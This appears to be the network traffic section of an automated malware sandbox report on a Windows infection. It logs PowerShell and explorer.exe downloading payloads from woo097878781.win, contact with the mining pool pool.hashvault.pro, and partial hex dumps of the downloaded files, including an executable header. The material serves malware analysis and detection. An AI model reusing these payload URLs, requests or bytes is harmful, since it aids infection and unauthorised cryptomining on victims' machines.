                                                                                                          Dec 9, 2024 07:38:29.506716013 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:29.876590967 CET44349764154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:29.876619101 CET44349764154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:29.876691103 CET49764443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:29.876722097 CET44349764154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:29.919960022 CET49764443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:29.919975042 CET44349764154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:29.971940041 CET3333498165.188.137.200192.168.2.4
                                                                                                          Dec 9, 2024 07:38:30.022337914 CET498163333192.168.2.45.188.137.200
                                                                                                          Dec 9, 2024 07:38:30.367995977 CET44349764154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:30.384063005 CET49764443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:30.384090900 CET44349764154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:30.384218931 CET49764443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:30.384223938 CET44349764154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:30.384342909 CET49764443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:30.384346962 CET44349764154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:30.384409904 CET49764443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:30.384413958 CET44349764154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:30.466079950 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:30.506675959 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:30.976692915 CET44349764154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:31.022299051 CET49764443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:31.163228035 CET49764443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:31.163234949 CET44349764154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:31.163292885 CET49764443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:31.163297892 CET44349764154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:31.163336992 CET49764443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:31.163341999 CET44349764154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:31.163383961 CET49764443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:31.163388014 CET44349764154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:31.469930887 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:31.522281885 CET497395200192.168.2.4185.157.162.216
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 9, 2024 07:37:02.468461037 CET | 64457 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 07:37:03.250855923 CET | 53 | 64457 | 1.1.1.1 | 192.168.2.4
Dec 9, 2024 07:37:36.142909050 CET | 54892 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 07:37:36.610291958 CET | 53 | 54892 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 9, 2024 07:37:02.468461037 CET | 192.168.2.4 | 1.1.1.1 | 0x26d9 | Standard query (0) | woo097878781.win | A (IP address) | IN (0x0001) | false
Dec 9, 2024 07:37:36.142909050 CET | 192.168.2.4 | 1.1.1.1 | 0xc27b | Standard query (0) | pool.hashvault.pro | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 9, 2024 07:37:03.250855923 CET | 1.1.1.1 | 192.168.2.4 | 0x26d9 | No error (0) | woo097878781.win |  | 154.216.20.243 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 07:37:36.610291958 CET | 1.1.1.1 | 192.168.2.4 | 0xc27b | No error (0) | pool.hashvault.pro |  | 37.203.243.102 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 07:37:36.610291958 CET | 1.1.1.1 | 192.168.2.4 | 0xc27b | No error (0) | pool.hashvault.pro |  | 5.188.137.200 | A (IP address) | IN (0x0001) | false
                                                                                                          • woo097878781.win
                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                          Dec 9, 2024 07:38:29.876619101 CET154.216.20.243443192.168.2.449764CN=woo097878781.win CN=R11, O=Let's Encrypt, C=USCN=R11, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USMon Nov 18 12:48:40 CET 2024 Wed Mar 13 01:00:00 CET 2024Sun Feb 16 12:48:39 CET 2025 Sat Mar 13 00:59:59 CET 2027771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0a0e9f5d64349fb13191bc781f81f42e1
                                                                                                          CN=R11, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USWed Mar 13 01:00:00 CET 2024Sat Mar 13 00:59:59 CET 2027
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 154.216.20.243 | 443 | 7216 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-09 06:37:07 UTC | 180 | OUT | GET /downloaded_file.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: woo097878781.win
Connection: Keep-Alive
2024-12-09 06:37:08 UTC | 270 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Dec 2024 06:37:08 GMT
Content-Type: application/octet-stream
Content-Length: 515600
Last-Modified: Tue, 03 Dec 2024 18:46:46 GMT
Connection: close
ETag: "674f5216-7de10"
X-Powered-By: PleskLin
Accept-Ranges: bytes
                                                                                                          2024-12-09 06:37:08 UTC16114INData Raw: 2e 0c eb e5 fe 51 53 1e 6f 1d b2 28 87 2a e1 8c f3 2c 26 02 f3 81 9b 35 82 5b 91 fb dc cd 0e fa ad 82 31 59 82 ff b6 b7 81 c5 e9 eb 21 76 36 67 6b aa 7f 50 fc fa 16 fc 10 fa 5f 9e 0a b2 fc db 15 50 63 7e fa d9 56 9b 5f 51 a5 28 4e 0e 99 6a 0a a8 f8 bb 0e 69 a0 d8 72 1c 78 8b 7b 10 66 58 dd 68 79 2e 5c 71 32 83 aa fb bd 26 ee 69 f0 86 3a 29 d5 65 fa 90 2b 96 da 7b c1 67 3b b2 fd 14 3f 8f 4b 92 e9 7c 36 83 dd 20 f8 35 15 1a c0 00 f5 e3 d1 d8 93 f5 49 c8 52 47 c8 9f 5b b7 9f 36 c7 de 76 82 00 9e 3a d9 45 db 98 eb 29 3f af ae 91 fd 98 0c 4d 89 b9 60 f0 a0 a0 77 ff a8 fc b4 7a e1 9a 5b 66 88 43 e1 20 01 12 3f d5 d5 ac 6f 1f 2c 95 0a 1b fb 78 96 cf 6b b4 18 4f dd 31 b8 ac 36 cd ca 89 ea 8b 41 b6 a7 b1 de 12 dd 67 6d 84 c5 40 e2 fa d3 49 09 89 26 16 e1 06 27 ca
                                                                                                          Data Ascii: .QSo(*,&5[1Y!v6gkP_Pc~V_Q(Njirx{fXhy.\q2&i:)e+{g;?K|6 5IRG[6v:E)?M`wz[fC ?o,xkO16Agm@I&'
                                                                                                          2024-12-09 06:37:08 UTC16384INData Raw: 8c 15 2f 34 a5 d7 35 3e bf 3c d8 89 78 cb 90 b2 e5 c4 92 d7 2d 5f f3 8a 36 64 02 ad 9e 1c a5 1a 80 94 05 5b 1a ee 74 67 74 40 3b 0a 1f 87 3c 3f f2 2a 83 c9 41 0a 9d 10 ab 5a a2 5d 87 10 49 1a e9 34 75 12 7a 2e dd 8b 1a 68 d3 71 ec 36 41 a5 0a 23 c9 41 83 fb 6e 40 e6 f9 a1 d1 30 51 8a 9c 75 5c d4 26 ed 71 ec 62 0c 70 55 35 0b 2d 99 be cc 8a 2a ea 32 99 3c 32 36 9a f8 a8 58 96 8e 39 d1 90 61 58 22 4e 35 2a 9d 47 cf 1c a1 fe 1e fb b4 7f a7 ad 2f 73 dc 4f 4c 7a 42 14 34 97 ea 6c 50 d8 1c ad 91 8e 8b 49 e4 70 13 1d c6 67 d0 cd d7 a9 98 d6 46 6f f0 da db 18 45 36 cf d3 2f 08 de d5 23 e2 4b 14 fb f4 85 aa e2 bc ef 67 76 47 c7 6f 8e 0b dd 73 5d f1 f6 79 cf e0 cd e4 76 d8 40 4e a0 41 f9 0d b9 2b a8 6c ea 6e 38 d7 6f 85 1c e7 7f bf 9f 35 66 a3 79 ac b4 1b 51 2a 11
                                                                                                          Data Ascii: /45><x-_6d[tgt@;<?*AZ]I4uz.hq6A#An@0Qu\&qbpU5-*2<26X9aX"N5*G/sOLzB4lPIpgFoE6/#KgvGos]yv@NA+ln8o5fyQ*
                                                                                                          2024-12-09 06:37:08 UTC16384INData Raw: 77 44 cc 55 d1 3d 87 bf 1a cd a3 dc 09 1e 03 48 d2 63 e4 fd 16 02 8b 35 46 16 d1 71 0a fb 48 45 d7 65 0c e4 3f 16 71 5a a7 8f 4a 34 9d db ac 23 24 b4 f1 f4 fe ce ff f4 8d bf bd 13 73 d7 6f e0 aa d8 49 af ed 20 5b f0 7a 6f 13 72 90 03 52 f8 fb a8 87 6d 01 ab b0 af 0a 29 ca a2 72 8e 8a c4 5a 08 80 6a 72 81 6d 24 35 60 5b 2f 63 42 ba f7 a1 d9 c4 f6 31 be 08 13 c0 3c 47 05 ca 1f 7c 28 38 0d c9 57 4e 4e 73 cb d0 d3 e4 94 9d 70 08 e1 6d 44 20 4b bf 81 f2 95 b8 c4 83 f1 ad c6 0b 96 0b 32 2e ce 8c 47 a2 ff 64 57 7c 24 3a ad a4 ca 7e 82 cb 2c 70 2e ad 80 09 24 2d 34 bd 7e 6a 88 2b fa d3 c4 bc ca 90 e7 87 5e 97 94 d9 1f c2 20 b8 35 b5 91 03 3c cf 86 35 3e b4 f2 b1 c9 10 c8 9c f6 f8 14 bb 71 48 a5 36 00 5c db 5e 9c 24 80 c7 33 0d 82 34 d2 b1 fb b0 14 84 3f 7d a4 9b
                                                                                                          Data Ascii: wDU=Hc5FqHEe?qZJ4#$soI [zorRm)rZjrm$5`[/cB1<G|(8WNNspmD K2.GdW|$:~,p.$-4~j+^ 5<5>qH6\^$34?}
                                                                                                          2024-12-09 06:37:08 UTC16384INData Raw: fb a5 8f 4e 3d 74 95 bc e4 1b 3d b0 55 a6 7f 3b 9a 97 80 1e be 13 2d d4 2c ac 4e 8b 21 c0 bc 74 5d 2a b9 00 b8 f7 8d 58 5d 7c b4 2c 5e 44 ec 39 7c 75 60 38 8a b0 d2 91 de f2 43 c7 bf 94 49 14 31 d3 2e cc 2c 16 86 ab c0 56 f1 21 ec 31 9a 2e 73 ba af 17 24 f7 cc 8d 68 14 78 49 d8 0a df 8e 5d 56 bf 86 10 78 66 fb a9 74 72 62 ff fb f2 cc dc 43 c0 66 d9 d2 69 9d 33 8d 18 23 00 b6 7e d2 0a 16 82 72 2a 3a 9b 9e 49 d4 70 7e 7f 2a 73 a5 09 0b 72 89 bc b5 c1 70 e2 71 ca 9c a0 6a 8b ea be 6b 16 83 c7 34 e5 39 3c 05 c3 44 93 39 fd b7 8f 20 dc 20 75 d7 f3 04 e3 39 64 ae ea 46 f7 86 ee 26 26 d4 cb 65 67 8d eb 55 30 0d a9 f5 b2 82 35 05 d4 18 13 94 d2 9a 15 fb 3f 4c 97 96 a8 ba 24 6a 28 c9 5b ed e3 33 9e c7 67 d0 7a a8 36 c2 37 29 68 4d 39 b3 a2 02 71 62 11 74 26 37 fa
                                                                                                          Data Ascii: N=t=U;-,N!t]*X]|,^D9|u`8CI1.,V!1.s$hxI]VxftrbCfi3#~r*:Ip~*srpqjk49<D9 u9dF&&egU05?L$j([3gz67)hM9qbt&7
                                                                                                          2024-12-09 06:37:08 UTC16384INData Raw: 9f e1 12 13 7a 42 b8 4c 70 71 f8 28 76 2f 9b ce e2 b0 71 ea c6 c4 0f 88 2d 12 1f a4 c9 6f 11 fa 35 f2 b5 ab 01 2e 70 2a eb b6 d0 94 3d 11 fb ca 58 3f e5 bf b6 8d ab 75 0e 5a 41 29 9a 63 5d 9e 20 64 0b 3b 3a ea eb 56 ef 21 eb ab a2 11 ba a6 ad e1 9e a3 2a c4 cd 15 d0 29 c1 1a db b7 1e 17 ef 4d ea e3 d1 9b e7 00 19 2a e8 77 6b 85 0d 16 e8 f7 d6 a8 e6 e7 bc c3 49 b9 b1 e0 80 5b 82 c5 7c ed 65 cb 19 82 52 b8 ee 21 ed 20 c2 3a 14 88 84 6a ef 9c 8d a0 c3 8f a8 dd 08 f3 2a 58 19 fe 0b a2 f3 a9 89 d2 a0 ba 20 b4 5f 0c 86 a4 44 f2 17 2c ba 36 e0 8f ff 49 35 99 d0 a1 49 3e 55 0e 25 80 23 af 61 4c 29 6a ae 72 d2 c6 ca 18 85 4c b6 b5 0c 56 e5 82 e4 06 b8 be 42 8b ff 68 62 1e b2 b0 81 fe c9 e7 b3 25 17 6d 86 2e c8 8a fb 10 26 e6 d6 77 7f 5e 2c fe f4 99 a8 e3 f1 c9 aa
                                                                                                          Data Ascii: zBLpq(v/q-o5.p*=X?uZA)c] d;:V!*)M*wkI[|eR! :j*X _D,6I5I>U%#aL)jrLVBhb%m.&w^,
                                                                                                          2024-12-09 06:37:08 UTC16384INData Raw: 86 90 1d 44 42 9e 9e b7 df c0 fc 4b 24 3b 49 c6 df f6 f3 3f de 4f f1 ad 49 e5 94 78 10 b5 28 78 f7 31 1f 26 42 f9 d6 49 0f 1f 08 d7 88 01 f8 4f 9d 88 f1 6e 41 c4 fe d2 40 9a 78 c3 21 3f e6 54 93 4f a0 10 cd a7 14 c4 58 22 7e 82 ef 66 2e d0 a9 62 62 45 aa 8a 7c c3 10 95 9f 4d ff 39 9d 09 ba 78 f4 76 64 e1 f7 82 c2 94 15 57 a9 87 a6 9a b2 6a 63 c9 33 e5 2e a2 98 e8 96 69 ee 0d 8a 69 0c cb 59 f3 10 69 af 9d 69 27 1a 8b 0d 9e b0 e9 3b c9 96 38 12 34 fc 59 59 bb 29 90 b4 6c a8 8d ac 42 57 d8 c7 b2 d3 e5 bc 7a c9 e8 a6 38 9e 3f de ab e6 6a a2 2e 8d 53 f4 b7 52 e1 7b 5d 8c b0 a6 c0 fd 0a 22 c9 4a 23 77 15 8f ee ce e2 bc 86 25 5c 60 3e 35 3a f0 7e 57 0f ef d7 04 df 32 8c 86 2b 15 a3 58 7e e1 88 b9 ea fb 41 9c 7b 4c 25 6a 7e 7b e0 49 0a 37 c3 87 f0 f6 39 2d a5 14
                                                                                                          Data Ascii: DBK$;I?OIx(x1&BIOnA@x!?TOX"~f.bbE|M9xvdWjc3.iiYii';84YY)lBWz8?j.SR{]"J#w%\`>5:~W2+X~A{L%j~{I79-
                                                                                                          2024-12-09 06:37:08 UTC16384INData Raw: 1b 71 e4 65 12 a3 0e 09 a9 9e ce 01 8d 50 66 7b b8 49 00 44 81 6b 18 ac 44 ac fb 81 a6 1e d2 90 95 f6 2b f1 f1 aa b8 dd d5 34 76 3a 16 7e 70 d4 f1 79 be 22 50 b5 3a f3 5f 48 e9 af 0d 4f 5f 78 71 00 a3 5f 42 f8 67 24 85 1d b3 fa ed 45 49 75 1a cf ec 38 3f 14 28 21 20 eb 36 3d 7a dc f7 92 30 73 f3 02 4c 91 75 8b 29 d1 a7 9c 5a 46 15 3d e1 35 1b e6 ee 5b 91 c0 c0 06 a0 24 58 a2 7b df 0d a7 2c 1c 4e 5a f0 49 b2 44 24 25 76 3b 9b 19 5d d2 ec 9c 9d 39 56 75 55 78 0f ee fa 2a 36 57 af a1 57 d9 72 61 a6 96 1c 71 84 fb 7f ca d1 37 6e f6 13 91 cd 2c 21 be 56 d9 38 6e 31 c6 29 c4 cc f2 69 0e 7d 20 df 37 5b 7d ae ac 23 3c 23 96 58 77 5c 97 11 b3 2d c3 dc c4 a4 21 7e a9 be 92 44 3a eb 6c fe 77 9f 82 8e f3 0c b5 81 65 4e df 4e e8 32 a1 5a e8 b6 7c da ac fb 0c ce a8 10
                                                                                                          Data Ascii: qePf{IDkD+4v:~py"P:_HO_xq_Bg$EIu8?(! 6=z0sLu)ZF=5[$X{,NZID$%v;]9VuUx*6WWraq7n,!V8n1)i} 7[}#<#Xw\-!~D:lweNN2Z|
                                                                                                          2024-12-09 06:37:09 UTC16384INData Raw: 63 56 1d ab 8d 68 f7 05 e7 4b 47 30 4c 8d 81 e5 3f 2c 84 53 f8 ea 71 36 b9 d8 1e 42 14 cb 56 5f f8 52 0c 5c 6b 27 7e 12 ba 8b ec 8c 50 d6 2b dc 8f 5d 10 b4 cb af 7d 0f bf 7b 0d 7d c9 58 db f4 06 fc 09 f6 d9 c4 e1 9a db 62 42 ce 27 14 05 4c 70 93 e2 d1 27 b4 0f 3c 6b 96 c7 bb 4a 7d 40 bf 18 95 46 87 c4 f6 7b da af dc 7d 39 e8 48 5a 4d 3a c2 df 55 66 04 cd 00 82 8a 2f fc d5 e2 e5 08 85 90 3f b6 7b 74 97 e8 94 85 dd 90 c4 3e 9d 1a 4f 11 13 06 21 56 ea 31 7c 4c cf 01 da 47 00 ff a1 2e 78 41 3d 9f b6 69 32 75 50 42 9f 2a 76 3c 71 dd 55 0c fc c2 46 ab bc 34 3b c9 c9 40 0e 15 c1 60 f0 66 44 2e ef 6e 75 99 b8 0a e3 74 b5 09 1b 5b 26 cb 37 b5 f1 63 bb 47 3f cb 80 46 95 be ac 8a 54 7d 9f 1e e2 73 f7 6e 2d 24 88 09 e2 36 d5 5d 58 47 f9 97 28 a1 82 23 8a ec 8c 1d af
                                                                                                          Data Ascii: cVhKG0L?,Sq6BV_R\k'~P+]}{}XbB'Lp'<kJ}@F{}9HZM:Uf/?{t>O!V1|LG.xA=i2uPB*v<qUF4;@`fD.nut[&7cG?FT}sn-$6]XG(#
                                                                                                          2024-12-09 06:37:09 UTC16384INData Raw: 20 7b 1d 64 91 3a dd ec 6c 9d cd 6f 3c 7b f3 05 64 9f 3a e9 13 ef af 5b 6b fb 73 4a 45 08 ce 8b 26 b5 c8 55 18 87 30 51 d0 e8 bb 80 a3 46 95 90 ab 7e 7c 82 a9 b8 4b 49 05 4c 2f f9 a6 44 f8 05 9f c2 0a fb d7 77 9d 12 a1 89 9a 3d 29 5f a8 1c 2b 9e 19 1f d1 01 c9 32 93 b3 4e 7a 21 1a e7 5c ed 35 cc e1 bf 22 50 da 19 9f 10 15 e5 1d 69 f8 77 06 45 b8 fd 62 26 77 22 1e 4d 96 bf 5f 5f 81 c0 50 3d 36 7b bc 78 ba a3 50 e5 51 15 b6 1a c2 0a fe a7 ac 26 19 b4 60 f6 9d 76 50 6b 70 5c eb 7f 68 73 c9 f3 2c 8b 86 51 2d 02 32 a8 3c 25 bb af cb 69 23 87 11 26 6a 5d ca 3a ae 0d 39 48 4d 8f 14 cb 9c 47 70 dc 7a bb 50 55 27 ce f2 a4 99 56 0f 29 d0 d5 ec e2 f9 88 12 e3 3b 24 69 b8 53 a2 d8 17 f6 dc 9b 2d 1a 25 84 a7 e5 0d 8c 05 02 1f 93 36 69 30 08 5f 7b 68 f9 1e 45 a4 74 7a
                                                                                                          Data Ascii: {d:lo<{d:[ksJE&U0QF~|KIL/Dw=)_+2Nz!\5"PiwEb&w"M__P=6{xPQ&`vPkp\hs,Q-2<%i#&j]:9HMGpzPU'V);$iS-%6i0_{hEtz
                                                                                                          2024-12-09 06:37:09 UTC16384INData Raw: 87 ed a9 a0 74 4b 83 c6 4c dd b7 95 c3 6b 7d ef e3 b5 45 c5 80 b8 d8 ce 6d 35 c2 84 fe b0 18 d0 45 85 d6 1b 42 ca 77 70 6b 28 6f 60 9f e9 90 6d 8a 12 6c 45 7b 29 92 41 a6 d0 ce 6d 06 3e bf 18 14 3e 4c 59 fb c7 1a cc 07 74 48 e1 76 62 5e 94 9a 43 f2 d5 d3 f9 42 4b d9 ab 59 e6 15 fd 39 03 0b 24 39 a1 bd a3 2f 22 ea 73 e9 7e 88 75 6a f2 68 05 6c 46 b8 58 de 2e b2 9a 37 8f 69 f7 f4 85 3e fc 3f 76 2d a4 69 0f d0 14 68 e7 03 4f ec 0f 59 9b 8d 23 b7 b6 41 11 ce 89 7f 68 20 c0 56 c1 42 a8 82 dd d7 dc 6f 30 bf 33 a7 04 5d 92 ac 1d ad a0 c2 7f 22 43 5b e2 4d 75 ba 37 3f ee 50 9a 37 11 c5 b1 41 b4 22 5c 9d bd 50 8c 88 18 49 63 07 0c f5 d1 0d 4a 37 ac eb 81 22 12 5b ad c2 62 20 dc 7c e9 b4 c6 48 b4 12 aa db e7 78 e7 18 e5 ae b2 8c 0b fd 65 81 d6 1f 8a b1 e8 fa 98 df
                                                                                                          Data Ascii: tKLk}Em5EBwpk(o`mlE{)Am>>LYtHvb^CBKY9$9/"s~ujhlFX.7i>?v-ihOY#Ah VBo03]"C[Mu7?P7A"\PIcJ7"[b |Hxe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 154.216.20.243 | 443 | 7784 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-09 06:37:30 UTC | 223 | OUT | GET /WindosCPUsystem.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Host: woo097878781.win
2024-12-09 06:37:30 UTC | 275 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Dec 2024 06:37:30 GMT
Content-Type: application/x-msdos-program
Content-Length: 2887168
Last-Modified: Mon, 09 Dec 2024 06:24:51 GMT
Connection: close
ETag: "67568d33-2c0e00"
X-Powered-By: PleskLin
Accept-Ranges: bytes
                                                                                                          2024-12-09 06:37:30 UTC16109INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0a 00 99 8c 56 67 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 60 03 00 00 0a 2c 00 00 04 00 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 80 2c 00 00 04 00 00 5f 8f 2c 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdVg.&`,@,_,`
                                                                                                          2024-12-09 06:37:30 UTC16384INData Raw: 74 2d 48 8d 05 52 1e 2b 00 41 b8 04 00 00 00 48 89 f1 41 89 d6 48 89 c2 ff 53 18 44 89 f2 84 c0 74 0d b0 01 48 83 c4 20 5b 5f 5e 41 5e 5d c3 83 fa 0a 0f 94 07 48 8b 43 20 48 89 f1 48 83 c4 20 5b 5f 5e 41 5e 5d 48 ff e0 66 2e 0f 1f 84 00 00 00 00 00 55 48 89 e5 49 89 d0 48 8d 15 ca 1d 2b 00 5d e9 dc f2 ff ff 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 48 81 ec 90 00 00 00 48 8d ac 24 80 00 00 00 48 8b 45 40 48 89 4d 00 48 89 55 08 4c 89 45 f0 4c 89 4d f8 48 89 e9 48 89 4d d0 48 8d 0d 3e f2 ff ff 48 89 4d d8 48 8d 4d f0 48 89 4d e0 48 8d 0d 4b f2 ff ff 48 89 4d e8 48 8d 0d 00 76 2b 00 48 89 4d a0 48 c7 45 a8 02 00 00 00 48 c7 45 c0 00 00 00 00 48 8d 4d d0 48 89 4d b0 48 c7 45 b8 02 00 00 00 48 8d 4d a0 90 50 5a e8 40 e3 ff ff cc 66 66 66 66 66 66 2e 0f 1f 84 00
                                                                                                          Data Ascii: t-HR+AHAHSDtH [_^A^]HC HH [_^A^]Hf.UHIH+]fff.UHH$HE@HMHULELMHHMH>HMHMHMHKHMHv+HMHEHEHMHMHEHMPZ@ffffff.
                                                                                                          2024-12-09 06:37:30 UTC16384INData Raw: 41 80 c2 04 45 89 d1 44 0f b6 5a 05 45 8d 53 bf 41 80 fa 1a 72 25 45 8d 53 9f 41 80 fa 1a 73 06 41 80 c3 b9 eb 12 45 8d 53 d0 41 80 fa 0a 0f 83 f7 00 00 00 41 80 c3 04 45 89 da 0f b6 72 06 44 8d 5e bf 41 80 fb 1a 72 25 44 8d 5e 9f 41 80 fb 1a 73 06 40 80 c6 b9 eb 12 44 8d 5e d0 41 80 fb 0a 0f 83 d8 00 00 00 40 80 c6 04 41 89 f3 0f b6 72 07 8d 56 bf 80 fa 1a 72 20 8d 56 9f 80 fa 1a 73 06 40 80 c6 b9 eb 10 8d 56 d0 80 fa 0a 0f 83 bd 00 00 00 40 80 c6 04 89 f2 0f b6 c0 45 0f b6 c0 c1 e0 0c 41 c1 e0 06 49 01 c0 41 0f b6 c1 4c 01 c0 45 0f b6 c2 48 c1 e0 0c 41 c1 e0 06 45 0f b6 cb 4d 01 c1 49 01 c1 49 c1 e1 06 0f b6 c2 4c 01 c8 90 50 5a 48 c1 ea 20 74 14 48 8d 05 29 13 2b 00 48 89 01 48 c7 41 08 28 00 00 00 eb 11 c7 41 08 01 00 00 00 89 41 0c 48 c7 01 00 00 00
                                                                                                          Data Ascii: AEDZESAr%ESAsAESAAErD^Ar%D^As@D^A@ArVr Vs@V@EAIALEHAEMIILPZH tH)+HHA(AAH
                                                                                                          2024-12-09 06:37:30 UTC16384INData Raw: 01 c2 4c 89 55 e0 4f 8d 14 18 4c 89 55 00 4d 89 c2 4d 29 ea 49 ff c2 4c 89 55 d8 4e 8d 24 06 49 89 cf 4d 89 c2 48 89 7d f8 eb 7d 80 7a 1a 00 74 0c 48 c7 01 02 00 00 00 e9 db 02 00 00 44 0f b6 52 18 44 89 d0 34 01 88 42 18 4c 8b 42 08 48 8b 42 48 4c 8b 4a 50 4d 85 c0 0f 84 b6 01 00 00 4d 39 c8 0f 83 a7 01 00 00 42 80 3c 00 bf 0f 8f a2 01 00 00 48 8d 0d 29 e7 2a 00 48 89 4c 24 20 48 89 c1 4c 89 ca e8 19 86 ff ff 45 31 c9 48 8b 7d f8 4c 89 4a 38 4d 89 cf 4c 8b 4d d0 4d 01 d1 49 39 c1 0f 83 81 02 00 00 4d 39 d0 0f 85 ee 00 00 00 46 0f b6 0c 0e 4c 0f a3 cf 73 57 4d 39 fd 4d 89 f9 4d 0f 47 cd 48 83 f9 ff 4d 0f 44 cd 4c 89 cf 66 90 4c 39 df 73 59 49 89 fa 4c 01 c7 48 39 c7 0f 83 5f 02 00 00 49 8d 7a 01 43 0f b6 1c 16 43 3a 1c 14 74 dd 4c 03 55 d8 4c 89 52 28 48
                                                                                                          Data Ascii: LUOLUMM)ILUN$IMH}}ztHDRD4BLBHBHLJPMM9B<H)*HL$ HLE1H}LJ8MLMMI9M9FLsWM9MMGHMDLfL9sYILH9_IzCC:tLULR(H
                                                                                                          2024-12-09 06:37:30 UTC16384INData Raw: ff f6 45 20 01 74 52 4c 8b 45 28 4d 85 c0 0f 84 c0 00 00 00 4d 39 f0 0f 87 7f 01 00 00 48 8d 4d f0 53 5a 90 e8 4a 39 ff ff 83 7d f0 01 0f 84 7e 01 00 00 48 8b 55 f8 4c 8b 45 00 eb 24 c6 47 04 00 48 8d 15 db b9 2a 00 e9 a7 fe ff ff 89 c1 e8 3b 4a 02 00 e9 7a fe ff ff 48 8b 55 28 4c 8b 45 30 56 90 59 e8 da 01 00 00 e9 86 fe ff ff 44 0f b6 c0 3c 05 0f 83 0b 01 00 00 48 8d 4d 20 48 89 fa e8 ed 38 ff ff c6 47 04 00 f6 45 20 01 75 62 48 8b 55 28 48 8b 45 30 48 89 45 d0 48 39 d8 0f 85 3c 01 00 00 56 59 90 49 89 d8 e8 93 01 00 00 48 09 c0 0f 85 3b fe ff ff 48 89 55 40 48 89 5d e0 48 39 d3 0f 85 37 01 00 00 ba 01 00 00 00 e9 20 fe ff ff 0f b6 03 48 8d 0d f1 b7 2a 00 0f b6 0c 08 4c 39 f1 76 0b 88 07 c6 47 04 01 e9 77 fe ff ff b8 01 00 00 00 48 8d 15 25 b9 2a 00 e9
                                                                                                          Data Ascii: E tRLE(MM9HMSZJ9}~HULE$GH*;JzHU(LE0VYD<HM H8GE ubHU(HE0HEH9<VYIH;HU@H]H97 H*L9vGwH%*
